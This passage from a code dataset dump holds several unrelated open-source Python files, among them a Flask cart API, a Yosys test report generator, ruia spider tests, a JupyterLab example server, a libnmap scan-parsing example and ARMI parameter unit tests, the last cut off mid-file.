max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
flaskshop/api/checkout.py | maquinuz/flask-shop | 141 | 12738766 | from flask_restplus import Namespace, Resource, fields
from flask_login import current_user
api = Namespace("checkout", description="Checkout related operations")
cart = api.model(
"CartLine",
{
"id": fields.Integer(required=True, description="The checkout cartline id"),
"quantity": fields.Integer(required=True, description="The cart item num"),
"title": fields.String(
description="The cart item title", attribute="variant.product.title"
),
"variant": fields.String(
description="The cart item variant", attribute="variant.title"
),
"product_id": fields.Integer(
description="The cart item product", attribute="variant.product.id"
),
"price": fields.Float(
description="The cart item price", attribute="variant.price"
),
"first_img": fields.String(
description="The cart item image", attribute="variant.product.first_img"
),
},
)
@api.route("/cart")
class CartIndex(Resource):
@api.doc("list_products")
@api.marshal_list_with(cart)
def get(self):
"""List current user cart items"""
cartitems = current_user.cart.lines
return cartitems
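# Editor's usage sketch (hedged, not part of the original flask-shop module): one
# way this Namespace could be mounted on a standalone Flask app. The "/api" prefix
# and the debug run below are assumptions for illustration only.
if __name__ == "__main__":
    from flask import Flask
    from flask_restplus import Api

    app = Flask(__name__)
    root_api = Api(app, prefix="/api")
    root_api.add_namespace(api)  # exposes GET /api/checkout/cart
    app.run(debug=True)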
|
third_party/tests/YosysTests/report.py | parzival3/Surelog | 156 | 12738767 | <reponame>parzival3/Surelog<filename>third_party/tests/YosysTests/report.py
#!/usr/bin/env python3
import os, time
from pathlib import Path
def getListOfFiles(dirName):
listOfFile = os.listdir(dirName)
allFiles = list()
for entry in listOfFile:
fullPath = os.path.join(dirName, entry)
if os.path.isdir(fullPath):
allFiles = allFiles + getListOfFiles(fullPath)
else:
if Path(fullPath).suffix==".status":
allFiles.append(fullPath)
return allFiles
def main():
listOfFiles = getListOfFiles('.')
listOfFiles.sort()
testsuits = list()
casenumber = dict()
errors = dict()
failures = dict()
total_errors = 0
total_failures = 0
min_start_time = time.time()
max_end_time = 0
for elem in listOfFiles :
st = elem.split('/')
testsuit = st[1]
testcase = st[-1].replace('.status','')
if (testsuit not in testsuits):
testsuits.append(testsuit)
casenumber[testsuit] = 0
errors[testsuit] = 0
failures[testsuit] = 0
casenumber[testsuit] += 1
status = open(elem, 'r').read().strip()
min_start_time = min(min_start_time, os.path.getmtime(os.path.join(os.path.dirname(elem),'.start')))
max_end_time = max(max_end_time, os.path.getmtime(os.path.join(os.path.dirname(elem),'.stamp')))
if (status=='ERROR'):
errors[testsuit] += 1
total_errors += 1
if (status=='FAIL'):
failures[testsuit] += 1
total_failures += 1
# Creating report
with open("report.xml", "w") as f:
print('<?xml version="1.0" encoding="UTF-8"?>', file=f)
print('<testsuites disabled="0" errors="%d" failures="%d" tests="%d" time="%d">' % (total_errors, total_failures, len(listOfFiles), max_end_time - min_start_time), file=f)
for suite in testsuits:
print(' <testsuite disabled="0" errors="%d" failures="%d" name="%s" skipped="0" tests="%d" time="%d">' % (errors[suite], failures[suite], suite, casenumber[suite], 0), file=f)
for elem in listOfFiles :
st = elem.split('/')
testsuit = st[1]
if (testsuit != suite):
continue
testcase = st[-1].replace('.status','')
casenumber[testsuit] += 1
status = open(elem, 'r').read().strip()
print(' <testcase classname="%s.%s" name="%s" status="%s" time="%d">' % (testsuit, st[2].replace('.status',''), testcase, status,
os.path.getmtime(os.path.join(os.path.dirname(elem),'.stamp')) - os.path.getmtime(os.path.join(os.path.dirname(elem),'.start'))), file=f)
if (status=='ERROR'):
print(' <error message="%s" type="%s"/>' % (status, status), file=f)
if (status=='FAIL'):
print(' <failure message="%s" type="%s"/>' % (status, status), file=f)
file_tb = os.path.join(os.path.dirname(elem),'testbench.log')
file_re = os.path.join(os.path.dirname(elem),'result.log')
file_ys = os.path.join(os.path.dirname(elem),'yosys.log')
if (os.path.isfile(file_tb)):
print('<system-out>', end="", file=f)
with open(file_tb, "r") as logf:
for line in logf:
print(line.replace("&", "&").replace("<", "<").replace(">", ">").replace("\"", """), end="", file=f)
print('</system-out>', file=f)
elif (os.path.isfile(file_re)):
print('<system-out>', end="", file=f)
with open(file_re, "r") as logf:
for line in logf:
print(line.replace("&", "&").replace("<", "<").replace(">", ">").replace("\"", """), end="", file=f)
print('</system-out>', file=f)
elif (os.path.isfile(file_ys)):
print('<system-out>', end="", file=f)
with open(file_ys, "r") as logf:
for line in logf:
print(line.replace("&", "&").replace("<", "<").replace(">", ">").replace("\"", """), end="", file=f)
print('</system-out>', file=f)
print(' </testcase>', file=f)
print(' </testsuite>', file=f)
print('</testsuites>', file=f)
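# Editor's note (hedged, not in the original script): the replace() chains above must
# escape '&' before the other characters; the standard library offers an equivalent
# helper that could be swapped in:
#   from xml.sax.saxutils import escape
#   escaped = escape(line, {'"': '&quot;'})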
if __name__ == '__main__':
main()
|
bibliopixel/util/threads/sub.py | rec/leds | 253 | 12738791 | <filename>bibliopixel/util/threads/sub.py
"""
More or less uniformly run something as a new daemon thread or process.
"""
import multiprocessing, threading, queue
def _run_locally(input, output, function, args, **kwds):
function(input, output, *args, **kwds)
def run(function, *args, use_subprocess=False, daemon=True, **kwds):
"""
Create input, output queues, call `function` in a subprocess or a thread.
``function`` is called like this: ``function(input, output, *args, **kwds)``
:param use_subprocess: if true, create a new multiprocess;
if false, create a new thread
:param function: the function to call
:param daemon: is the thread or subprocess run as a daemon or not?
:param args: positional arguments to the function
:param kwds: keyword arguments to the function
:returns: a tuple with three elements: the subprocess or thread, an input
queue, and an output queue.
"""
if use_subprocess:
Creator, Queue = multiprocessing.Process, multiprocessing.Queue
else:
Creator, Queue = threading.Thread, queue.Queue
input, output = Queue(), Queue()
args = input, output, function, args
sub = Creator(target=_run_locally, args=args, kwargs=kwds, daemon=daemon)
sub.start()
return sub, input, output
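# Editor's usage sketch (hedged): "_echo_upper" below is illustrative only, not part
# of bibliopixel; it shows the function(input, output, *args, **kwds) calling shape.
if __name__ == '__main__':
    def _echo_upper(input, output):
        # Take one item off the input queue and push the transformed result back.
        output.put(input.get().upper())

    worker, inq, outq = run(_echo_upper)  # defaults: daemon thread, no subprocess
    inq.put('hello')
    print(outq.get())  # -> 'HELLO'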
|
qrcode.py | sulphatet/Python | 28,321 | 12738801 | <filename>qrcode.py<gh_stars>1000+
#importing Required Modules
import qrcode
#QR Code Generator
query = input("Enter Content: ") #Enter Content
code = qrcode.make(str(query)) #Making the QR code
code.save("qrcode.png") #Saving the QR code file |
libs/python/config/python.py | Manu343726/boost-cmake | 918 | 12738802 | <gh_stars>100-1000
#
# Copyright (c) 2016 <NAME>
# All rights reserved.
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from . import ui
def add_options(vars):
ui.add_option('--python', help='the python executable')
def check(context):
python_source_file = r"""
// If defined, enforces linking againg PythonXXd.lib, which
// is usually not included in Python environments.
#undef _DEBUG
#include "Python.h"
int main()
{
Py_Initialize();
Py_Finalize();
return 0;
}
"""
import platform
import subprocess
import re, os
def check_python(cmd):
        return subprocess.check_output([python, '-c', cmd]).decode().strip()
def check_sysconfig(cmd):
r = check_python('import distutils.sysconfig as c; print(c.%s)'%cmd)
return r if r != 'None' else ''
context.Message('Checking for Python...')
python = context.env.GetOption('python') or 'python'
context.env['PYTHON'] = python
incpath = check_sysconfig('get_python_inc()')
context.env.AppendUnique(CPPPATH=[incpath])
if platform.system() == 'Windows':
version = check_python('import sys; print("%d%d"%sys.version_info[0:2])')
prefix = check_python('import sys; print(sys.prefix)')
libfile = os.path.join(prefix, 'libs', 'python%s.lib'%version)
libpath = os.path.join(prefix, 'libs')
lib = 'python%s'%version
context.env.AppendUnique(LIBS=[lib])
else:
libpath = check_sysconfig('get_config_var("LIBDIR")')
libfile = check_sysconfig('get_config_var("LIBRARY")')
        match = re.search(r'(python.*)\.(a|so|dylib)', libfile)
lib = None
if match:
lib = match.group(1)
context.env.AppendUnique(PYTHONLIBS=[lib])
if match.group(2) == 'a':
flags = check_sysconfig('get_config_var("LINKFORSHARED")')
if flags is not None:
context.env.AppendUnique(LINKFLAGS=flags.split())
context.env.AppendUnique(LIBPATH=[libpath])
oldlibs = context.AppendLIBS([lib])
flags = check_sysconfig('get_config_var("MODLIBS")')
flags += ' ' + check_sysconfig('get_config_var("SHLIBS")')
flags = [f[2:] for f in flags.strip().split() if f.startswith('-l')]
if flags:
context.AppendLIBS([flags])
result = context.TryLink(python_source_file,'.cpp')
if not result and context.env['PLATFORM'] == 'darwin':
# Sometimes we need some extra stuff on Mac OS
frameworkDir = libpath # search up the libDir tree for the proper home for frameworks
while frameworkDir and frameworkDir != "/":
frameworkDir, d2 = os.path.split(frameworkDir)
if d2 == "Python.framework":
if not "Python" in os.listdir(os.path.join(frameworkDir, d2)):
context.Result(0)
print((
"Expected to find Python in framework directory %s, but it isn't there"
% frameworkDir))
return False
break
context.env.AppendUnique(LINKFLAGS="-F%s" % frameworkDir)
result = context.TryLink(python_source_file,'.cpp')
if not result:
context.Result(0)
print("Cannot link program with Python.")
return False
if context.env['PLATFORM'] == 'darwin':
context.env['LDMODULESUFFIX'] = '.so'
context.Result(1)
context.SetLIBS(oldlibs)
context.env.AppendUnique(PYTHONLIBS=[lib] + flags)
return True
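# Editor's sketch (hedged, not part of the original build config): the values that
# check() consumes can be probed standalone for debugging with distutils.sysconfig.
if __name__ == '__main__':
    import distutils.sysconfig as sc
    print('include dir:', sc.get_python_inc())
    print('LIBDIR     :', sc.get_config_var('LIBDIR'))
    print('LIBRARY    :', sc.get_config_var('LIBRARY'))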
|
tests/test_spider.py | 123seven/ruia | 1,090 | 12738808 | <gh_stars>1000+
#!/usr/bin/env python
import asyncio
import os
from ruia import Item, Middleware, Request, Response, Spider, TextField
from ruia.exceptions import SpiderHookError
html_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "for_spider_testing.html"
)
with open(html_path, mode="r", encoding="utf-8") as file:
HTML = file.read()
middleware = Middleware()
async def retry_func(request):
request.request_config["TIMEOUT"] = 10
@middleware.request
async def print_on_request(spider_ins, request):
request.headers = {"User-Agent": "ruia ua"}
@middleware.response
async def print_on_response(spider_ins, request, response):
assert isinstance(await response.text(), str)
assert request.headers == {"User-Agent": "ruia ua"}
class ItemDemo(Item):
title = TextField(xpath_select="/html/head/title")
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
request_config = {"RETRIES": 3, "DELAY": 0, "TIMEOUT": 20}
headers = {"User-Agent": "Ruia Spider"}
aiohttp_kwargs = {}
call_nums = 0
async def parse(self, response):
yield Request(
url=response.url,
callback=self.parse_item,
headers=self.headers,
request_config=self.request_config,
**self.aiohttp_kwargs,
)
async def parse_item(self, response):
pages = [f"https://httpbin.org/get?p={i}" for i in range(1, 2)]
async for resp in self.multiple_request(pages):
yield self.parse_next(response=resp, any_param="hello")
async def parse_next(self, response, any_param):
assert any_param == "hello"
yield self.request(
url="https://httpbin.org/get?p=2",
metadata={"any_param": any_param},
callback=self.parse_details,
)
async def parse_details(self, response):
item = await ItemDemo.get_item(html=HTML)
yield item
async def process_item(self, item: ItemDemo):
assert item.title == "for_spider_testing"
await self.count_nums()
async def count_nums(self):
SpiderDemo.call_nums += 1
def test_spider_with_middleware():
loop = asyncio.new_event_loop()
SpiderDemo.start(loop=loop, middleware=middleware)
assert SpiderDemo.call_nums == 1
def test_spider_with_error_middleware():
error_middleware = Middleware()
@error_middleware.request
def error_request(spider_ins, request, response):
pass
@error_middleware.response
async def error_response(spider_ins, request, response):
raise TypeError("error")
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
async def parse(self, response):
pass
SpiderDemo.start(middleware=error_middleware)
def test_spider_hook():
async def after_start_func(spider_ins):
print("after_start_func")
spider_ins.result["after_start"] = True
assert isinstance(spider_ins.result, dict)
async def before_stop_func(spider_ins):
print("before_stop_func")
spider_ins.result["before_stop"] = True
class SpiderHook(Spider):
start_urls = ["https://httpbin.org/get?p=0", "https://httpbin.org/404"]
request_config = {"RETRIES": 1, "DELAY": 0, "TIMEOUT": 10}
result = {
"after_start": False,
"before_stop": False,
"process_succeed_response": False,
"process_failed_response": False,
"process_item": False,
}
async def parse(self, response):
item = await ItemDemo.get_item(html=HTML)
yield item
async def process_item(self, item):
self.result["process_item"] = True
async def process_succeed_response(self, request, response):
# Hook for response
self.result["process_succeed_response"] = True
async def process_failed_response(self, request, response):
# Hook for response
self.result["process_failed_response"] = True
# Test middleware & hook
loop = asyncio.new_event_loop()
SpiderHook.start(
loop=loop, after_start=after_start_func, before_stop=before_stop_func
)
assert SpiderHook.result["after_start"] == True
assert SpiderHook.result["before_stop"] == True
assert SpiderHook.result["process_succeed_response"] == True
assert SpiderHook.result["process_failed_response"] == True
assert SpiderHook.result["process_item"] == True
def test_spider_hook_error():
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
async def parse(self, response):
pass
async def before_stop_func(spider_ins):
raise TypeError("error")
loop = asyncio.new_event_loop()
try:
SpiderDemo.start(loop=loop, before_stop=before_stop_func)
except Exception as e:
assert isinstance(e, SpiderHookError)
def test_invalid_callback_result():
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
result = {"process_callback_result": False}
async def parse(self, response):
yield {}
async def process_dict_callback_result(spider_ins, callback_result):
spider_ins.result["process_callback_result"] = True
class CustomCallbackResultType:
@classmethod
def init_spider(cls, spider):
spider.callback_result_map = spider.callback_result_map or {}
setattr(
spider, "process_dict_callback_result", process_dict_callback_result
)
spider.callback_result_map.update({"dict": "process_dict_callback_result"})
CustomCallbackResultType.init_spider(SpiderDemo)
loop = asyncio.new_event_loop()
SpiderDemo.start(loop=loop)
assert SpiderDemo.result["process_callback_result"] == True
def test_spider_multiple_request_sync():
result = list()
class MultipleRequestSpider(Spider):
start_urls = ["https://httpbin.org"]
concurrency = 3
async def parse(self, response: Response):
urls = [f"https://httpbin.org/get?p={page}" for page in range(1, 2)]
async for response in self.multiple_request(urls, is_gather=True):
yield self.parse_next(response=response)
async def parse_next(self, response):
json_result = await response.json()
page = json_result["args"]["p"]
result.append(int(page))
MultipleRequestSpider.start()
assert result == [1]
def test_no_start_url_spider():
try:
class NoStartUrlSpider(Spider):
pass
NoStartUrlSpider.start()
except Exception as e:
assert isinstance(e, ValueError)
def test_callback_error():
class NoParseSpider(Spider):
start_urls = ["https://httpbin.org/get"]
NoParseSpider.start()
class CallbackError(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
raise ValueError("error")
CallbackError.start()
def test_coroutine_callback_error():
class CoroutineItemErrorSpider(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
pages = ["https://httpbin.org/get?p=1"]
async for resp in self.multiple_request(pages):
yield self.parse_item(response=resp)
async def parse_item(self, response):
await ItemDemo.get_item(html=await response.text())
CoroutineItemErrorSpider.start()
class CoroutineErrorSpider(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
pages = ["https://httpbin.org/get?p=1"]
async for resp in self.multiple_request(pages):
yield self.parse_item(response=resp)
async def parse_item(self, response):
raise ValueError("error")
CoroutineErrorSpider.start()
def test_nothing_matched_spider():
class NothingMatchedErrorSpider(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
await ItemDemo.get_item(html=await response.text())
NothingMatchedErrorSpider.start()
def test_multiple_spider():
class MultipleSpider(Spider):
count = 0
start_urls = ["https://httpbin.org/get?p=0"]
async def parse(self, response):
MultipleSpider.count += 1
async def multiple_spider(loop):
await MultipleSpider.async_start(loop=loop, middleware=[middleware])
await MultipleSpider.async_start(loop=loop, middleware=middleware)
return MultipleSpider
loop = asyncio.new_event_loop()
spider_ins = loop.run_until_complete(multiple_spider(loop=loop))
assert spider_ins.count == 2
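# Editor's note (hedged): these tests hit httpbin.org over the network and are
# presumably collected with pytest, e.g. `pytest tests/test_spider.py -q`.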
|
packages/services/examples/browser/main.py | DianeHu/jupyterlab | 11,496 | 12738816 | """
Copyright (c) Jupyter Development Team.
Distributed under the terms of the Modified BSD License.
"""
import os
import json
import os.path as osp
from jupyter_server.base.handlers import JupyterHandler, FileFindHandler
from jupyter_server.extension.handler import ExtensionHandlerMixin, ExtensionHandlerJinjaMixin
from jupyterlab_server import LabServerApp, LabConfig
from jupyter_server.utils import url_path_join as ujoin
from traitlets import Unicode
HERE = osp.dirname(__file__)
with open(os.path.join(HERE, 'package.json')) as fid:
version = json.load(fid)['version']
def _jupyter_server_extension_points():
return [
{
'module': __name__,
'app': ExampleApp
}
]
class ExampleHandler(
ExtensionHandlerJinjaMixin,
ExtensionHandlerMixin,
JupyterHandler
):
"""Handle requests between the main app page and notebook server."""
def get(self):
"""Get the main page for the application's interface."""
config_data = {
# Use camelCase here, since that's what the lab components expect
"appVersion": version,
'baseUrl': self.base_url,
'token': self.settings['token'],
'fullStaticUrl': ujoin(self.base_url, 'static', self.name),
'frontendUrl': ujoin(self.base_url, 'example/')
}
return self.write(
self.render_template(
'index.html',
static=self.static_url,
base_url=self.base_url,
token=self.settings['token'],
page_config=config_data
)
)
class ExampleApp(LabServerApp):
extension_url = '/example'
default_url = '/example'
app_url = "/example"
name = __name__
load_other_extensions = False
app_name = 'JupyterLab Example Service'
app_settings_dir = os.path.join(HERE, 'build', 'application_settings')
app_version = version
schemas_dir = os.path.join(HERE, 'build', 'schemas')
static_dir = os.path.join(HERE, 'build')
templates_dir = os.path.join(HERE, 'templates')
themes_dir = os.path.join(HERE, 'build', 'themes')
user_settings_dir = os.path.join(HERE, 'build', 'user_settings')
workspaces_dir = os.path.join(HERE, 'build', 'workspaces')
def initialize_handlers(self):
"""Add example handler to Lab Server's handler list.
"""
self.handlers.append(
('/example', ExampleHandler)
)
if __name__ == '__main__':
ExampleApp.launch_instance()
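# Editor's note (hedged): running `python main.py` launches a Jupyter server that
# loads only this extension (load_other_extensions=False) and serves
# templates/index.html at /example with the page_config built in ExampleHandler.get.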
|
binding/web/tests/en-factory/selenium_test.py | Stonesjtu/porcupine | 1,034 | 12738822 | <filename>binding/web/tests/en-factory/selenium_test.py<gh_stars>1000+
#!/usr/bin/python3
import os
import sys
import threading
import time
from argparse import ArgumentParser
from http.server import HTTPServer, SimpleHTTPRequestHandler
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from webdriver_manager.chrome import ChromeDriverManager
class SimpleHttpServer(threading.Thread):
def __init__(self, host='localhost', port=4001, path='.'):
self._base_url = f'http://{host}:{port}'
self._root_path = path
self._cwd = os.getcwd()
self._server = HTTPServer((host, port), SimpleHTTPRequestHandler)
super().__init__(daemon=True)
@property
def base_url(self):
return self._base_url
def run(self):
os.chdir(self._root_path)
print(f'starting server on port {self._server.server_port}')
self._server.serve_forever()
def stop(self):
os.chdir(self._cwd)
self._server.shutdown()
self._server.socket.close()
print(f'stopping server on port {self._server.server_port}')
def run_unit_test_selenium(url, access_key, absolute_audio_file):
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities['goog:loggingPrefs'] = {'browser': 'ALL'}
opts = Options()
opts.headless = True
driver = webdriver.Chrome(ChromeDriverManager().install(), desired_capabilities=desired_capabilities, options=opts)
driver.get(url)
assert "unit test" in driver.title
wait = WebDriverWait(driver, 10)
driver.find_element_by_id("audioFile").send_keys(absolute_audio_file)
wait.until(EC.visibility_of_element_located((By.ID, "audioLoaded")))
driver.find_element_by_id("accessKey").send_keys(access_key)
driver.find_element_by_id("sumbit").click()
wait.until(EC.visibility_of_element_located((By.ID, "testComplete")))
test_result = 1
test_message = "Tests failed"
for entry in driver.get_log('browser'):
print(entry['message'])
if 'Test passed!' in entry['message']:
test_message = "Tests passed"
test_result = 0
driver.close()
print(test_message)
return test_result
def main():
parser = ArgumentParser()
parser.add_argument(
'--access_key',
required=True)
parser.add_argument(
'--audio_file',
required=True)
args = parser.parse_args()
absolute_audio_file = os.path.abspath(args.audio_file)
simple_server = SimpleHttpServer(port=4005, path=os.path.join(os.path.dirname(__file__), '..', '..'))
test_url = f'{simple_server.base_url}/porcupine-web-en-factory/test/index.html'
simple_server.start()
time.sleep(4)
result = 0
try:
result = run_unit_test_selenium(test_url, args.access_key, absolute_audio_file)
except Exception as e:
print(e)
result = 1
finally:
simple_server.stop()
sys.exit(result)
if __name__ == '__main__':
main()
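# Editor's note (hedged): expected invocation, with a hypothetical key and audio path:
#   python3 selenium_test.py --access_key <ACCESS_KEY> --audio_file /path/to/sample.wav
# Both flags are required by the ArgumentParser above; the Chrome driver is fetched
# at runtime via webdriver_manager.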
|
examples/check_cpe.py | FreddieDev/python-libnmap | 414 | 12738829 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from libnmap.parser import NmapParser
rep = NmapParser.parse_fromfile("libnmap/test/files/full_sudo6.xml")
print(
"Nmap scan discovered {0}/{1} hosts up".format(
rep.hosts_up, rep.hosts_total
)
)
for _host in rep.hosts:
if _host.is_up():
print(
"+ Host: {0} {1}".format(_host.address, " ".join(_host.hostnames))
)
# get CPE from service if available
for s in _host.services:
print(
" Service: {0}/{1} ({2})".format(
s.port, s.protocol, s.state
)
)
# NmapService.cpelist returns an array of CPE objects
for _serv_cpe in s.cpelist:
print(" CPE: {0}".format(_serv_cpe.cpestring))
if _host.os_fingerprinted:
print(" OS Fingerprints")
for osm in _host.os.osmatches:
print(
" Found Match:{0} ({1}%)".format(osm.name, osm.accuracy)
)
# NmapOSMatch.get_cpe() method return an array of string
# unlike NmapOSClass.cpelist which returns an array of CPE obj
for cpe in osm.get_cpe():
print("\t CPE: {0}".format(cpe))
|
armi/reactor/tests/test_parameters.py | keckler/armi | 162 | 12738832 | # Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" tests of the Parameters class """
# pylint: disable=missing-function-docstring,missing-class-docstring,abstract-method,protected-access
import unittest
import traceback
import armi
from armi.reactor import parameters
from armi.reactor import composites
class MockComposite:
def __init__(self, name):
self.name = name
self.p = {}
class MockCompositeGrandParent(MockComposite):
pass
class MockCompositeParent(MockCompositeGrandParent):
pass
class MockCompositeChild(MockCompositeParent):
pass
class ParameterTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.defs = parameters.ALL_DEFINITIONS._paramDefs
@classmethod
def tearDownClass(cls):
parameters.ALL_DEFINITIONS._paramDefs = cls.defs
def setUp(self):
parameters.ALL_DEFINITIONS._paramDefs = []
def test_mutableDefaultsNotSupported(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
with self.assertRaises(AssertionError):
pb.defParam("units", "description", "location", default=[])
with self.assertRaises(AssertionError):
pb.defParam("units", "description", "location", default={})
with self.assertRaises(AssertionError):
fail = pDefs.createBuilder(default=[])
with self.assertRaises(AssertionError):
fail = pDefs.createBuilder(default={})
def test_paramPropertyDoesNotConflict(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("doodle", "units", "description", "location", default=42)
with pDefs.createBuilder(MockComposite, default=0.0) as pb:
pb.defParam("cheese", "kg", "pressed curds of milk", "avg")
pb.defParam("fudge", "kg", "saturated chocolate", "avg", default=19)
pb.defParam(
"noodles",
"kg",
"strip, ring, or tube of pasta",
"avg",
default=None,
)
mock1 = Mock()
mock2 = Mock()
self.assertEqual(42, mock1.doodle)
self.assertEqual(42, mock2.doodle)
self.assertEqual(0.0, mock1.cheese) # make sure factory default is applied
self.assertEqual(
19, mock2.fudge
) # make sure we can override the factory default
self.assertEqual(
None, mock2.noodles
) # make sure we can override the factory default
mock1.doodle = 17
self.assertEqual(17, mock1.doodle)
self.assertEqual(42, mock2.doodle)
def test_paramPropertyDoesNotConflictWithNoneDefault(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam(
"noneDefault", "units", "description", "location", default=None
)
mock1 = Mock()
mock2 = Mock()
self.assertIsNone(mock1.noneDefault)
self.assertIsNone(mock2.noneDefault)
mock1.noneDefault = 1.234
self.assertEqual(1.234, mock1.noneDefault)
self.assertEqual(None, mock2.noneDefault)
def test_getWithoutDefaultRaisesParameterError(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("noDefault", "units", "description", "location")
mock = Mock()
with self.assertRaises(parameters.ParameterError):
print(mock.noDefault)
def test_attemptingToSetParamWithoutSetterFails(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam(
"noSetter",
"noSetter",
"units",
"description",
"location",
default="encapsulated",
setter=None,
)
mock = Mock()
self.assertEqual("encapsulated", mock.noSetter)
with self.assertRaises(parameters.ParameterError):
mock.noSetter = False
self.assertEqual("encapsulated", mock.noSetter)
def test_setter(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
def n(self, value):
self._p_n = value
self._p_nPlus1 = value + 1
pb.defParam("n", "units", "description", "location", setter=n)
def nPlus1(self, value):
self._p_nPlus1 = value
self._p_n = value - 1
pb.defParam("nPlus1", "units", "description", "location", setter=nPlus1)
mock = Mock()
self.assertTrue(
all(
pd.assigned == parameters.NEVER
for pd in mock.paramDefs
if pd.name != "serialNum"
)
)
with self.assertRaises(parameters.ParameterError):
print(mock.n)
with self.assertRaises(parameters.ParameterError):
print(mock.nPlus1)
mock.n = 15
self.assertEqual(15, mock.n)
self.assertEqual(16, mock.nPlus1)
mock.nPlus1 = 22
self.assertEqual(21, mock.n)
self.assertEqual(22, mock.nPlus1)
self.assertTrue(all(pd.assigned for pd in mock.paramDefs))
def test_cannotDefineParameterWithSameName(self):
with self.assertRaises(parameters.ParameterDefinitionError):
class MockParamCollection(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 1", "location")
pb.defParam("sameName", "units", "description 2", "location")
_ = MockParamCollection()
def test_paramDefinitionsCompose(self):
class MockBaseParamCollection(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("base1", "units", "a param on the base collection", "avg")
pb.defParam(
"base2", "units", "another param on the base collection", "avg"
)
class MockDerivedACollection(MockBaseParamCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("derAp1", "units", "derived a p 1", "centroid")
pb.defParam("derAp2", "units", "derived a p 2", "centroid")
class MockDerivedBCollection(MockDerivedACollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("derBp", "units", "derived b param", "centroid")
base = MockBaseParamCollection()
derA = MockDerivedACollection()
derB = MockDerivedBCollection()
self.assertTrue(
set(base.paramDefs._paramDefs).issubset(set(derA.paramDefs._paramDefs))
)
self.assertTrue(
set(base.paramDefs._paramDefs).issubset(set(derB.paramDefs._paramDefs))
)
self.assertTrue(
set(derA.paramDefs._paramDefs).issubset(set(derB.paramDefs._paramDefs))
)
def test_cannotDefineParameterWithSameNameForCollectionSubclass(self):
class MockPCParent(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 3", "location")
with self.assertRaises(parameters.ParameterDefinitionError):
class MockPCChild(MockPCParent):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 4", "location")
_ = MockPCChild()
# same name along a different branch from the base ParameterCollection should be fine
class MockPCUncle(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 5", "location")
def test_cannotCreateAttrbuteOnParameterCollectionSubclass(self):
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("someParam", "units", "description", "location")
_ = MockPC()
def test_cannotCreateInstanceOf_NoDefault(self):
with self.assertRaises(NotImplementedError):
_ = parameters.NoDefault()
def test_cannotCreateInstanceOf_Undefined(self):
with self.assertRaises(NotImplementedError):
_ = parameters.parameterDefinitions._Undefined()
def test_defaultLocation(self):
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder(location=parameters.ParamLocation.AVERAGE) as pb:
pb.defParam("p1", "units", "p1 description")
pb.defParam(
"p2", "units", "p2 description", parameters.ParamLocation.TOP
)
pc = MockPC()
self.assertEqual(pc.paramDefs["p1"].location, parameters.ParamLocation.AVERAGE)
self.assertEqual(pc.paramDefs["p2"].location, parameters.ParamLocation.TOP)
def test_categories(self):
class MockPC0(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("p0", "units", "p0 description", "location")
pc = MockPC0()
self.assertEqual(pc.paramDefs.categories, set())
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
